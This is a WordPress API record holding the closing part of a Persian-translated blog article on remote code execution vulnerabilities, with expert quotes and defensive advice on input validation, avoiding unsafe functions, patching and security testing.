class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u0622\u0632\u0645\u0627\u06cc\u0634 \u0646\u0641\u0648\u0630 \u0648 \u062d\u0633\u0627\u0628\u0631\u0633\u06cc<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Simulate attacks to find weaknesses\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A8%DB%8C%D9%86%D8%B4_%D9%85%D8%AA%D8%AE%D8%B5%D8%B5\"><\/span>\n<p>  \u0628\u06cc\u0646\u0634 \u0645\u062a\u062e\u0635\u0635<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<blockquote>\n<p>&#8220;\u0627\u06a9\u062b\u0631\u06cc\u062a \u0642\u0631\u06cc\u0628 \u0628\u0647 \u0627\u062a\u0641\u0627\u0642 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0647\u0627\u06cc RCE \u06a9\u0647 \u0645\u0627 \u062f\u0631 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647 \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0647\u062f\u0641 \u0648\u062d\u0634\u06cc \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc \u06a9\u0646\u06cc\u0645. \u062a\u0627\u062e\u06cc\u0631 \u067e\u0686 \u062f\u0634\u0645\u0646 \u0648\u0627\u0642\u0639\u06cc \u0627\u0633\u062a.&#8221;<\/p>\n<p>&#8211; <em>\u06a9\u06cc\u062a\u06cc \u0645\u0648\u0633\u0648\u0631\u06cc<\/em>\u060c \u0628\u0646\u06cc\u0627\u0646\u06af\u0630\u0627\u0631 \u0648 \u0645\u062f\u06cc\u0631\u0639\u0627\u0645\u0644 Luta Security<\/p>\n<p>&#8220;Deserialization \u0627\u0645\u0646 \u0647\u0646\u0648\u0632 \u062a\u0648\u0633\u0637 \u062a\u0648\u0633\u0639\u0647 \u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0636\u0639\u06cc\u0641 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u06cc\u06a9 \u0642\u0627\u062a\u0644 \u0633\u0627\u06a9\u062a \u062f\u0631 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631 \u0634\u0631\u06a9\u062a \u0627\u0633\u062a.&#8221;<\/p>\n<p>&#8211; <em>\u0622\u062f\u0627\u0645 \u0634\u0648\u0633\u062a\u0627\u06a9<\/em>\u060c \u06a9\u0627\u0631\u0634\u0646\u0627\u0633 \u0645\u062f\u0644 \u0633\u0627\u0632\u06cc \u062a\u0647\u062f\u06cc\u062f \u060c \u0645\u0639\u0645\u0627\u0631 \u0633\u0627\u0628\u0642 \u0627\u0645\u0646\u06cc\u062a \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a<\/p>\n<\/blockquote>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D9%BE%D8%A7%DB%8C%D8%A7%D9%86\"><\/span>\n<p>  \u067e\u0627\u06cc\u0627\u0646<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u0627\u0632 \u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 \u062a\u0627 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647 \u0647\u0627\u06cc \u0646\u0627\u0627\u0645\u0646 \u060c \u0634\u0627\u06cc\u0639 \u062a\u0631\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc RCE \u0646\u0627\u0634\u06cc \u0627\u0632 \u0646\u0642\u0635 \u0647\u0627\u06cc \u0642\u0627\u0628\u0644 \u067e\u06cc\u0634 \u0628\u06cc\u0646\u06cc \u0648 \u0627\u063a\u0644\u0628 \u0642\u0627\u0628\u0644 \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u062f\u0631 \u0645\u0646\u0637\u0642 \u06a9\u0627\u0631\u0628\u0631\u062f \u0648 \u0628\u0647\u062f\u0627\u0634\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0633\u062a.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%D8%BA%D8%B0%D8%A7%DB%8C_%D8%A7%D8%B5%D9%84%DB%8C\"><\/span>\n<p>  \u063a\u0630\u0627\u06cc \u0627\u0635\u0644\u06cc:<br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p><strong>\u0627\u0639\u062a\u0628\u0627\u0631 \u0647\u0645\u0647 \u0648\u0631\u0648\u062f\u06cc \u0647\u0627<\/strong>\u060c \u0647\u0645\u06cc\u0634\u0647<\/p>\n<\/li>\n<li>\n<p><strong>\u0627\u0632 \u0639\u0645\u0644\u06a9\u0631\u062f\u0647\u0627\u06cc \u0646\u0627\u0627\u0645\u0646 \u062e\u0648\u062f\u062f\u0627\u0631\u06cc \u06a9\u0646\u06cc\u062f<\/strong> \u0645\u0627\u0646\u0646\u062f <code>eval()<\/code>\u0628\u0627 <code>system()<\/code>\u0628\u0627 <code>pickle.loads()<\/code>\u0628\u0634\u0631<\/p>\n<\/li>\n<li>\n<p><strong>\u067e\u0686 \u0628\u0647 \u0637\u0648\u0631 \u0645\u0631\u062a\u0628<\/strong>services \u062e\u062f\u0645\u0627\u062a \u06a9\u0645 \u0645\u0634\u062e\u0635 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0627\u0647\u062f\u0627\u0641 \u0628\u0627\u0634\u062f.<\/p>\n<\/li>\n<li>\n<p><strong>\u062a\u0633\u062a \u0628\u0627 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u062a\u0648\u0647\u06cc\u0646 \u0622\u0645\u06cc\u0632<\/strong> \u0645\u0627\u0646\u0646\u062f \u0641\u0627\u0632 \u060c \u0622\u0646\u0627\u0644\u0627\u06cc\u0632\u0631 \u0627\u0633\u062a\u0627\u062a\u06cc\u06a9 \u0648 \u062a\u0645\u0631\u06cc\u0646\u0627\u062a \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632.<\/p>\n<\/li>\n<\/ul>\n<p>\u0645\u0627 \u0628\u0627 \u06cc\u06a9 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u062a\u0631\u0633\u0646\u0627\u06a9 \u0634\u0631\u0648\u0639 \u06a9\u0631\u062f\u06cc\u0645 \u0648 \u0648\u0627\u0642\u0639\u06cc \u0627\u0633\u062a. \u0627\u0645\u0627 \u0628\u0627 \u062f\u0627\u0646\u0634 \u062f\u0631\u0633\u062a \u0645\u06cc \u062a\u0648\u0627\u0646\u06cc\u062f <em>\u062c\u062f\u0627\u0648\u0644 \u0631\u0627 \u0628\u0686\u0631\u062e\u0627\u0646\u06cc\u062f<\/em> \u062f\u0631 \u0645\u0648\u0631\u062f \u0645\u0647\u0627\u062c\u0645\u0627\u0646<\/p>\n<blockquote>\n<p>\u0641\u0642\u0637 <em>\u0627\u0645\u06cc\u062f\u0648\u0627\u0631 \u0628\u0648\u062f\u0646<\/em> \u0628\u0631\u0646\u0627\u0645\u0647 \u0634\u0645\u0627 \u0627\u0645\u0646 \u0627\u0633\u062a <strong>\u062b\u0627\u0628\u062a \u06a9\u0646\u06cc\u062f<\/strong>&#8211; \u0627\u06cc\u0646 \u0631\u0627 \u0627\u0645\u062a\u062d\u0627\u0646 \u06a9\u0646\u06cc\u062f \u060c \u0622\u0646 \u0631\u0627 \u0648\u0635\u0644\u0647 \u06a9\u0646\u06cc\u062f \u0648 \u0642\u0628\u0644 \u0627\u0632 \u0627\u06cc\u0646\u06a9\u0647 \u0634\u062e\u0635 \u062f\u06cc\u06af\u0631\u06cc \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u062f \u060c \u0622\u0646 \u0631\u0627 \u0628\u0634\u06a9\u0646\u06cc\u062f.<\/p>\n<\/blockquote><\/div>\n","protected":false},"excerpt":{"rendered":"<p>\u0645\u0642\u062f\u0645\u0647 \u062a\u0635\u0648\u0631 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u06cc\u06a9 \u063a\u0631\u06cc\u0628\u0647 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u0628\u062f\u0648\u0646 \u0627\u062c\u0627\u0632\u0647 \u0634\u0645\u0627 \u062f\u0631 \u067e\u0634\u062a \u0635\u0641\u062d\u0647 \u0631\u0627\u06cc\u0627\u0646\u0647 \u062e\u0648\u062f \u0628\u0646\u0634\u06cc\u0646\u062f. \u0627\u06cc\u0646 \u0648\u0627\u0642\u0639\u06cc\u062a \u0648\u062d\u0634\u062a\u0646\u0627\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 (RCE) \u0627\u0633\u062a. \u062f\u0631 \u0633\u0627\u0644\u0647\u0627\u06cc \u0627\u062e\u06cc\u0631 \u060c \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0647\u0627\u06cc \u0645\u0647\u0645 \u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0634\u0631\u06a9\u062a \u0647\u0627\u06cc \u0628\u0631\u062a\u0631 \u0648 \u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u060c \u0642\u0631\u0628\u0627\u0646\u06cc \u062d\u0645\u0644\u0627\u062a \u0633\u0627\u06a9\u062a \u0648 \u062f\u0631 \u0639\u06cc\u0646 \u062d\u0627\u0644 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":105173,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/media2.dev.to\/dynamic\/image\/width=1000,height=500,fit=cover,gravity=auto,format=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcm3gddv2db03pluk4a9q.png","fifu_image_alt":"","footnotes":""},"categories":[339],"tags":[],"class_list":["post-105172","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-dev"],"_links":{"self":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts\/105172","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/comments?post=105172"}],"version-history":[{"count":0,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/posts\/105172\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/media\/105173"}],"wp:attachment":[{"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/media?parent=105172"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/categories?post=105172"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nabfollower.com\/blog\/wp-json\/wp\/v2\/tags?post=105172"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}